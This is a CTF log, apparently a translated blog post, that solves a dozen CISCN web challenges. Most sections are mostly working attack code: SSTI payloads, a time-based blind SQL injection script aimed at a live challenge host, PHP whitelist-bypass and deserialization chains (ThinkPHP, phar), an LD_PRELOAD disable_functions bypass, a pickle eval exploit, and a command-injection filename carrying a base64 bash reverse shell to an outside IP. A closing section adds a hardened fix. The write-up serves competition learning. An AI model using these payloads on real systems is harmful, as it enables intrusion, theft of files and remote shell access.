【Web】A complete beginner's CISCN problem log (1)

Contents

- [[CISCN 2019华东南]Web11](#[CISCN 2019华东南]Web11)
- [[CISCN 2019华北Day2]Web1](#[CISCN 2019华北Day2]Web1)
- [[CISCN 2019初赛]Love Math](#[CISCN 2019初赛]Love Math)
- [[CISCN 2022 初赛]ezpop](#[CISCN 2022 初赛]ezpop)
- [[CISCN 2019华东南]Double Secret](#[CISCN 2019华东南]Double Secret)
- [[CISCN 2023 华北]ez_date](#[CISCN 2023 华北]ez_date)
- [[CISCN 2019华北Day1]Web1](#[CISCN 2019华北Day1]Web1)
- [[CISCN 2019华东南]Web4](#[CISCN 2019华东南]Web4)
- [[CISCN 2019华北Day1]Web2](#[CISCN 2019华北Day1]Web2)
- [[CISCN 2023 西南]do_you_like_read](#[CISCN 2023 西南]do_you_like_read)
- [[CISCN 2023 华北]pysym](#[CISCN 2023 华北]pysym)
- [[CISCN 2023 初赛]DeserBug](#[CISCN 2023 初赛]DeserBug)


Kept deliberately brief.

## [CISCN 2019华东南]Web11

The X-Forwarded-For header is rendered through a Smarty template, so there is server-side template injection in that header.

payload:

```http
X-Forwarded-For: {if system('tac /flag')}{/if}
```

## [CISCN 2019华北Day2]Web1

`if(1=1,sleep(5),1)` in the `id` parameter delays the response, so the injection is time-based blind.

Script. For each character position it walks the ASCII range upward; a request that times out means the server executed `sleep()`, i.e. the character is greater than `j`. The first `j` that returns promptly is the character itself. Note that a slow network round trip longer than the 0.5 s timeout is misread as "the condition was true", so the threshold needs headroom over the real latency:

```python
import requests

url = 'http://node4.anna.nssctf.cn:28396/index.php'
res = ""

for i in range(1, 48):
    for j in range(32, 128):
        # Stage 1: table names in the current database
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{j},sleep(0.5),0)#'
        # Stage 2: column names of the users table
        # payload = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{j},sleep(0.5),0)#"
        # Stage 3: the flag column of the flag table
        payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{j},sleep(1),0)"
        data = {
            'id': payload
        }
        try:
            # timeout shorter than sleep(1): a timeout means ascii(...) > j
            r = requests.post(url=url, data=data, timeout=0.5)
        except requests.exceptions.RequestException:
            continue  # still greater than j, keep climbing

        # first j that answers in time is the character
        res += chr(j)
        print(res)
        break
```

## [CISCN 2019初赛]Love Math

The WAF treats every token that is not a plain number as a function name and checks it against a whitelist of math functions, so the call has to be built without any non-whitelisted identifier appearing literally.

Target construction:

```
?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag
```

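An added helper (mine, not the author's) that performs the number conversions this section works out by hand: identifiers made only of `0-9a-z` become `base_convert(N,10,36)`, names with other characters such as `_GET` go through `hex2bin(dechex(N))`, and `identifiers()` lists the tokens the WAF would check. The identifier regex is an approximation of the WAF's tokenisation, which the page does not quote; the 7-byte cap on `hex2bin_call()` follows from `dechex()` taking a signed 64-bit PHP int.

```python
import re
import string

BASE36 = string.digits + string.ascii_lowercase   # what base_convert(n, 10, 36) can emit
MAX_DECHEX_BYTES = 7                             # dechex() takes a PHP int (signed 64-bit)


def base36_call(name):
    """Spell a [0-9a-z] identifier as base_convert(N,10,36), which yields it at runtime."""
    if not name or any(c not in BASE36 for c in name):
        raise ValueError(f"{name!r} has characters outside 0-9a-z; use hex2bin_call()")
    return f"base_convert({int(name, 36)},10,36)"


def hex2bin_call(name):
    """Spell any short ASCII name as hex2bin(dechex(N)): dechex() turns the
    decimal N into the hex string of the name, hex2bin() turns that into the
    name. The hex string itself is never written out because it usually
    contains a-f, which the WAF would treat as an identifier."""
    raw = name.encode("ascii")
    if len(raw) > MAX_DECHEX_BYTES:
        raise ValueError("name too long for a single dechex()")
    return f"{base36_call('hex2bin')}(dechex({int(raw.hex(), 16)}))"


def build_c(func_param="pi", arg_param="cos"):
    """$pi = '_GET'; $$pi is $_GET; {} stands in for the blocked [] (PHP 7 only,
    removed in PHP 8). The parameter names must themselves be whitelisted
    math functions, which is why the page uses pi and cos."""
    return f"$pi={hex2bin_call('_GET')};($$pi){{{func_param}}}(($$pi){{{arg_param}}})"


def build_payload(func="system", arg="cat /flag"):
    return f"?c={build_c()}&pi={func}&cos={arg}"


def identifiers(expr):
    """Assumed approximation of what the WAF checks: every identifier-looking
    token (anything that is not a plain number) must be on the whitelist."""
    return sorted(set(re.findall(r"[A-Za-z_][A-Za-z0-9_]*", expr)))


if __name__ == "__main__":
    print(build_payload())
    print(identifiers(build_c()))
```

`build_payload()` reproduces the payload given further down exactly; `identifiers()` on the `c` expression yields only `base_convert`, `cos`, `dechex` and `pi`, all of them whitelisted math functions.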
`[` and `]` are blacklisted; the `{}` array-access syntax does the same job (`$_GET{pi}` is `$_GET['pi']`). This syntax exists in PHP 7 only and was removed in PHP 8.0.

`_GET` cannot be produced with `base_convert()` directly, because `_` is not a base-36 digit, so it is produced with `hex2bin()`: `_GET` = `hex2bin('5f474554')`. The hex string `5f474554` contains the letter `f`, so the WAF would treat it as an identifier; it is generated at runtime instead: `dechex(1598506324)` = `'5f474554'` (0x5f474554 = 1598506324).

`hex2bin` itself consists only of digits and lowercase letters, so it can be produced with `base_convert()`: base 36 uses the digits 0-9 and the letters a-z (36 symbols), enough to cover every letter in the name. `base_convert()` converts the decimal number to base 36:

![](https://file.jishuzhan.net/article/1777265091599667202/15fb2c36cd7ec793daefa840159711b5.webp)

`hex2bin` = `base_convert(37907361743,10,36)`

payload:

```
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag
```

`$pi` now holds the string `_GET`, so `$$pi` is `$_GET`; `($$pi){pi}` is `$_GET['pi']` = `system`, called with `$_GET['cos']`. Every identifier in `c` (`pi`, `base_convert`, `dechex`, `cos`) is a whitelisted math function.

![](https://file.jishuzhan.net/article/1777265091599667202/d2d09cd0fea0afde69ea3903d9bdc115.webp)

## [CISCN 2022 初赛]ezpop

Reference: [ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户](https://www.freebuf.com/vuls/321546.html "ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户")

/www.zip gives the source. The unserialize entry point is /index.php/index/index.

![](https://file.jishuzhan.net/article/1777265091599667202/bfdf6c5182e50ddce8066d8437c163f2.webp)

exp. This is the ThinkPHP 6.0.12 Model chain analysed in the article above: `Model::__destruct` with `lazySave` set calls `save()`; because `table` holds another Model object, it is concatenated as a string and the inner model's `__toString()` runs; `toJson()`/`toArray()` then apply the `withAttr` callback (`system`) to the value stored under `whoami` in `data`. Extraction dropped the opening of the file up to the middle of the constructor; the namespace and class skeleton below is restored from the visible closing braces, with the property visibilities of `think\Model` in 6.0.12 (they must match, or unserialize will not populate the fields):

```php
<?php
namespace think {
    abstract class Model {
        private $lazySave;
        private $data;
        private $exists;
        protected $table;
        private $withAttr;
        protected $json;
        protected $jsonAssoc;

        public function __construct($obj = '') {
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /nssctfflag']];
            $this->exists = True;
            $this->table = $obj;          // inner Model; string concatenation triggers its __toString()
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami', ['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model {
    use think\Model;
    class Pivot extends Model {
    }
}
```

`Model` is abstract, so the concrete `Pivot` is what gets instantiated: an outer `Pivot` whose `table` is a second `Pivot`. The lines that build and serialize that pair are not on the page.

![](https://file.jishuzhan.net/article/1777265091599667202/ddd290a213f5c785dedb6afa0c4a2b35.webp)

## [CISCN 2019华东南]Double Secret

![](https://file.jishuzhan.net/article/1777265091599667202/1ffd8a1cfb7870d7be2553e3aa76b334.webp)

Visit /robots.txt

![](https://file.jishuzhan.net/article/1777265091599667202/a75465c420bf7eb1c45c3bed779a8aa3.webp)

/secret asks for a `secret` parameter

![](https://file.jishuzhan.net/article/1777265091599667202/34ac3a1efa7f69c508150f5ea79ecf45.webp)

Any value triggers a debug traceback; expanding the marked frame shows the handler

![](https://file.jishuzhan.net/article/1777265091599667202/fac78fb78af98dd69c482af1b19299bb.webp)

It RC4-decrypts `secret` with the key "HereIsTreasure" and renders the result as a Flask (Jinja2) template, so template injection gives command execution; the payload only has to be RC4-encrypted first.

RC4 encryption script. The XOR runs over the message's code points, matching the pure-Python RC4 on the server; the base64 round trip is the original script's and changes nothing:

```python
import base64
from urllib import parse


def rc4_main(key="init_key", message="init_message"):
    # return the encrypted message, base64 encoded
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_encrypt(message, s_box))
    return crypt


def rc4_init_sbox(key):
    # key-scheduling algorithm
    s_box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box


def rc4_encrypt(plain, box):
    # keystream generation, XORed against each code point
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    return str(base64.b64encode(cipher.encode('utf-8')), 'utf-8')


key = "HereIsTreasure"
message = input("Enter plaintext:\n")
enc_base64 = rc4_main(key, message)
enc_init = str(base64.b64decode(enc_base64), 'utf-8')
enc_url = parse.quote(enc_init)   # percent-encode; the server decodes it back to the same code points
print("URL-encoded RC4 ciphertext: " + enc_url)
# print("base64 RC4 ciphertext: " + enc_base64)
```

Injection payload:

```
{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}
```

![](https://file.jishuzhan.net/article/1777265091599667202/f02952868be8abe80264e54e0d70a6f8.webp)

![](https://file.jishuzhan.net/article/1777265091599667202/58ecfac911b0059fc7ce2b3f7f602017.webp)

## [CISCN 2023 华北]ez_date

![](https://file.jishuzhan.net/article/1777265091599667202/b55a2bb9c4b907f6716d6f5ca3dbb376.webp)

On the md5/sha1 strict comparison: `1` and `'1'` are not identical (`!==`), but `md5()` and `sha1()` cast both to the string `"1"`, so the hashes compare equal even with `===`. The file path is written as `/f\l\a\g`: a literal match for `flag` does not find it, while a shell that later runs `cat` on the path drops the backslashes and reads /flag. Extraction dropped the class definition; it is restored from the serialized payload (class `date`, three public properties):

```php
<?php
class date {
    public $a;
    public $b;
    public $file;
}
$a = new date();
$a->a = 1;
$a->b = '1';
$a->file = '/f\l\a\g';
echo base64_encode(serialize($a));
?>
```

payload:

```
?code=Tzo0OiJkYXRlIjozOntzOjE6ImEiO2k6MTtzOjE6ImIiO3M6MToiMSI7czo0OiJmaWxlIjtzOjg6Ii9mXGxcYVxnIjt9
```

which decodes to `O:4:"date":3:{s:1:"a";i:1;s:1:"b";s:1:"1";s:4:"file";s:8:"/f\l\a\g";}`.

![](https://file.jishuzhan.net/article/1777265091599667202/2a21c78cb78f88ccc056313611bc41fe.webp)

## [CISCN 2019华北Day1]Web1

![](https://file.jishuzhan.net/article/1777265091599667202/6baf5f7d7572bcfbb41b0b40a7b59ca1.webp)

Register any account and log in

![](https://file.jishuzhan.net/article/1777265091599667202/c7a34cf91c135485fc05e5d6e7ac6171.webp)

download.php serves the source of every file, so the code can be reviewed.

Generate a malicious phar and upload it with a changed extension. Extraction dropped the start of the file and the `__HALT_COMPILER()` part of the stub; both are restored (`class User` is reduced to the `db` property the chain needs). `phar.readonly` must be off to write the archive (`php -d phar.readonly=0 exp.php`):

```php
<?php
class User {
    public $db;
    public function __construct() {
        $this->db = new FileList();
    }
}
class File {
    public $filename;
}
class FileList {
    private $files;
    public function __construct() {
        $file = new File();
        $file->filename = '/flag.txt';
        $this->files = array($file);
    }
}
$User = new User();
$phar = new Phar("exp.phar");                               // build the phar archive
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER(); ?>');  // GIF magic in front of the mandatory stub
$phar->setMetadata($User);                                  // object unserialized when the phar is opened
$phar->addFromString("text.txt", "test");                   // at least one entry; the signature is written automatically
$phar->stopBuffering();
?>
```

POST to delete.php with the phar path; `unlink()` parses the phar and unserializes its metadata:

```
filename=phar://exp.png
```

![](https://file.jishuzhan.net/article/1777265091599667202/41dc001b0ec8c7bd1872fed5305c9dd2.webp)

## [CISCN 2019华东南]Web4

The response headers show a Python framework

![](https://file.jishuzhan.net/article/1777265091599667202/878b9a1b5fda80f38b8db2178cb77b7d.webp)

/read?url=/app/app.py returns the source (Python 2's `urllib.urlopen` opens a bare path as a local file). Obvious session forgery:

```python
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())          # seed = the NIC's MAC address as an integer
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True


@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! Read somethings'


@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
        return 'no response'


@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'


if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )
```

The current session cookie, decoded like a JWT (base64 payload plus signature), contains `www-data`; all that is missing is the secret key.

![](https://file.jishuzhan.net/article/1777265091599667202/4d7490fac69de8c1f0e4612846dd30ff.webp)

`random` is a pseudo-random generator: with the same seed it produces the same sequence. The seed is `uuid.getnode()`, the NIC's MAC address as an integer, so read /sys/class/net/eth0/address through the same /read endpoint.

![](https://file.jishuzhan.net/article/1777265091599667202/717d41bf3ab3480f8225cf5390bacd87.webp)

Hex to decimal: 2485376933288

```python
import random

random.seed(2485376933288)
randStr = str(random.random() * 233)
print randStr
```

Run this under Python 2 like the target (`print` statement). Python 2's `str()` of a float keeps 12 significant digits while Python 3's prints the shortest round-tripping representation, so the same script under Python 3 yields a different key.

![](https://file.jishuzhan.net/article/1777265091599667202/fd9580932026c180a9930f679ebff80e.webp)

![](https://file.jishuzhan.net/article/1777265091599667202/e4cb495e75bfa57ec97d4a47f1807622.webp)

Re-sign the session with `username` set to `fuck` and request /flag.
![](https://file.jishuzhan.net/article/1777265091599667202/f3ca2c30b71e0e61fd832910e021ed94.webp)

## [CISCN 2019华北Day1]Web2

The goal is to buy the lv6 item

![](https://file.jishuzhan.net/article/1777265091599667202/fa1449d9e70206760d94618909b45e49.webp)

Brute-force the shop pages with a script:

```python
import requests
import time

for i in range(1, 200):
    time.sleep(0.8)   # go easy on the target
    print(i)
    url = 'http://node4.anna.nssctf.cn:28867/shop?page={}'.format(i)
    r = requests.get(url)
    if 'lv6.png' in r.text:
        print("found lv6 on page {}".format(i))
        break
```

![](https://file.jishuzhan.net/article/1777265091599667202/b20694845e20db5665d42345f2d26206.webp)

![](https://file.jishuzhan.net/article/1777265091599667202/202b429244f9d66ceb0760d7dc41580c.webp)

Buying requires an account

![](https://file.jishuzhan.net/article/1777265091599667202/30a2e97be9c5260e6c16cffb5920b8d6.webp)

Register one; there is not enough money to buy it

![](https://file.jishuzhan.net/article/1777265091599667202/01f91cb64dd10464828e0341c52c48ac.webp)

But `discount` can be tampered with, and the response reveals the /b1g_m4mber route

![](https://file.jishuzhan.net/article/1777265091599667202/48c2185d5e02cd2100f96093956a61cf.webp)

Visiting it demands admin

![](https://file.jishuzhan.net/article/1777265091599667202/dede7f4a640089b86ee8108d49c4c955.webp)

Vertical privilege escalation: brute-force the JWT secret key

![](https://file.jishuzhan.net/article/1777265091599667202/e2603160a09c9b056f43feaa8a8a2da9.webp)

Set username to admin and re-sign the JWT

![](https://file.jishuzhan.net/article/1777265091599667202/25fde509bbaf80bad507cc608d15e7d6.webp)

Use the forged JWT on /b1g_m4mber

![](https://file.jishuzhan.net/article/1777265091599667202/16cf1829f6d310d39dee8e45960701f3.webp)

View source: www.zip

![](https://file.jishuzhan.net/article/1777265091599667202/8adee0ede333792243088e40ac12e2d6.webp)

Admin.py calls `pickle.loads()` on a request parameter, so this is pickle deserialization RCE:

```python
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))   # attacker-controlled pickle
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)
```

Run this under Python 2 (the target unpickles with Python 2; `urllib.quote` and the str pickle match it):

```python
import pickle
import urllib


class test(object):
    def __reduce__(self):
        # unpickling calls eval(...); the return value becomes `res` in the template
        return (eval, ("open('/flag.txt', 'r').read()",))


a = test()
s = pickle.dumps(a)
print(urllib.quote(s))
```

POST the output as `become` to the admin page.

![](https://file.jishuzhan.net/article/1777265091599667202/a53d01f87b349a74783c212490436409.webp)

## [CISCN 2023 西南]do_you_like_read

Drop the attachment into Seay for a scan

![](https://file.jishuzhan.net/article/1777265091599667202/a5d9aa0d66fb9afd1f32f1adf3948d7d.webp)

/bootstrap/test/bypass_disablefunc.php stands out: the classic LD_PRELOAD `disable_functions` bypass. `mail()` spawns sendmail; with LD_PRELOAD pointing at the .so, the preloaded library runs inside that child process and executes the command stored in EVIL_CMDLINE. The HTML markup in the echo strings was dropped by extraction and is restored:

```php
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";

// the preloaded .so reads this variable and runs it
putenv("EVIL_CMDLINE=" . $evil_cmdline);

$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);

// forks sendmail, which picks up LD_PRELOAD
mail("", "", "", "");

echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";

unlink($out_path);
?>
```

A usable .so sits in the same directory

![](https://file.jishuzhan.net/article/1777265091599667202/d8847ecce88011aa776007a6ff87cf85.webp)

payload:

```
/bootstrap/test/bypass_disablefunc.php?cmd=env&outpath=/tmp/xx&sopath=/app/bootstrap/test/bypass_disablefunc_x64.so
```

![](https://file.jishuzhan.net/article/1777265091599667202/6217fbf3268b87550f64e7c56ca49abf.webp)

## [CISCN 2023 华北]pysym

The challenge hints that symlinks are out

![](https://file.jishuzhan.net/article/1777265091599667202/619f1eea098b81b59862f6d89998a000.webp)

Source from the attachment (the `<path:path>` route variable and `links=links` were eaten by extraction and are restored; the `os.path.isdir(path)` check is the challenge's own):

```python
from flask import Flask, render_template, request, send_from_directory
import os
import random
import string

app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'uploads'


@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')


@app.route('/', methods=['POST'])
def POST():
    if 'file' not in request.files:
        return 'No file uploaded.'
    file = request.files['file']
    if file.content_length > 10240:
        return 'file too lager'
    path = ''.join(random.choices(string.hexdigits, k=16))
    directory = os.path.join(app.config['UPLOAD_FOLDER'], path)
    os.makedirs(directory, mode=0o755, exist_ok=True)
    savepath = os.path.join(directory, file.filename)   # filename is attacker-controlled
    file.save(savepath)
    try:
        # shell command built by string formatting from the filename
        os.system('tar --absolute-names -xvf {} -C {}'.format(savepath, directory))
    except:
        return 'something wrong in extracting'
    links = []
    for root, dirs, files in os.walk(directory):
        for name in files:
            extractedfile = os.path.join(root, name)
            if os.path.islink(extractedfile):
                os.remove(extractedfile)
                return 'no symlink'
            if os.path.isdir(path):
                return 'no directory'
            links.append(extractedfile)
    return render_template('index.html', links=links)


@app.route("/uploads/<path:path>", methods=['GET'])
def download(path):
    filepath = os.path.join(app.config['UPLOAD_FOLDER'], path)
    if not os.path.isfile(filepath):
        return '404', 404
    return send_from_directory(app.config['UPLOAD_FOLDER'], path)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)
```

The filename is not filtered at all and is formatted straight into the `os.system()` string (the `try/except` never fires: `os.system()` returns the exit status rather than raising), so a filename can terminate the tar command and append another one.

payload (the upload's filename):

```
exp.tar;echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjEn | base64 -d | bash;
```

The base64 decodes to `bash -c 'bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'`.

![](https://file.jishuzhan.net/article/1777265091599667202/e32ec9010e0eacc78dfe2c747e679f18.webp)

Reverse shell received; flag obtained

![](https://file.jishuzhan.net/article/1777265091599667202/834f28fd9d368f347a09c19a0788abf2.webp)

## [CISCN 2023 初赛]DeserBug

Written up separately: [【Web】记录CISCN2023国赛初赛DeserBug题目复现_deserbug ctf-CSDN博客](https://z3r4y.blog.csdn.net/article/details/136748656 "【Web】记录CISCN2023国赛初赛DeserBug题目复现_deserbug ctf-CSDN博客")
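
An added example for the pysym section above (mine, not the challenge's code). It rebuilds the challenge's `os.system()` command line with an injected filename and runs it through the shell locally, with a harmless `echo` standing in for the page's base64-decoded reverse shell, and shows the hardened version: a filename allow-list plus `subprocess.run` with an argument list, under which the whole name is one argument to tar and `;` has no meaning. Assumptions: `/bin/sh` is available; tar may or may not be installed (its failure is irrelevant, the `;` runs the next command regardless); the allow-list pattern is a suggestion, not the challenge's.

```python
import os
import re
import subprocess
import tempfile

SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")   # assumption: what an upload name may look like
INJECTED_NAME = "exp.tar;echo INJECTED;"            # constructed: echo stands in for the page's base64 | bash


def vulnerable_cmdline(savepath, directory):
    """The challenge's string; os.system() hands it to /bin/sh unchanged."""
    return 'tar --absolute-names -xvf {} -C {}'.format(savepath, directory)


def run_vulnerable(filename):
    """Run the challenge's command in a scratch directory and return stdout.
    The archive never exists, so tar fails; ';' in the name runs the rest anyway."""
    with tempfile.TemporaryDirectory() as directory:
        savepath = os.path.join(directory, filename)
        proc = subprocess.run(vulnerable_cmdline(savepath, directory), shell=True,
                              capture_output=True, text=True, timeout=10)
        return proc.stdout


def safe_argv(filename, directory):
    """Hardened version: reject anything but a plain name, then build an argv
    list for subprocess.run(argv) with no shell in between. --absolute-names
    is dropped too, so archive members cannot escape the directory."""
    if not SAFE_NAME.match(filename) or filename in (".", ".."):
        return None
    savepath = os.path.join(directory, filename)
    return ["tar", "-xvf", savepath, "-C", directory]


if __name__ == "__main__":
    print(repr(run_vulnerable(INJECTED_NAME)))
    print(safe_argv(INJECTED_NAME, "uploads/abc"))
    print(safe_argv("exp.tar", "uploads/abc"))
```

With `safe_argv`, the injected name is refused outright; even if it were passed through, `subprocess.run(argv)` would give tar a single argument `exp.tar;echo INJECTED;` and nothing else would execute.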
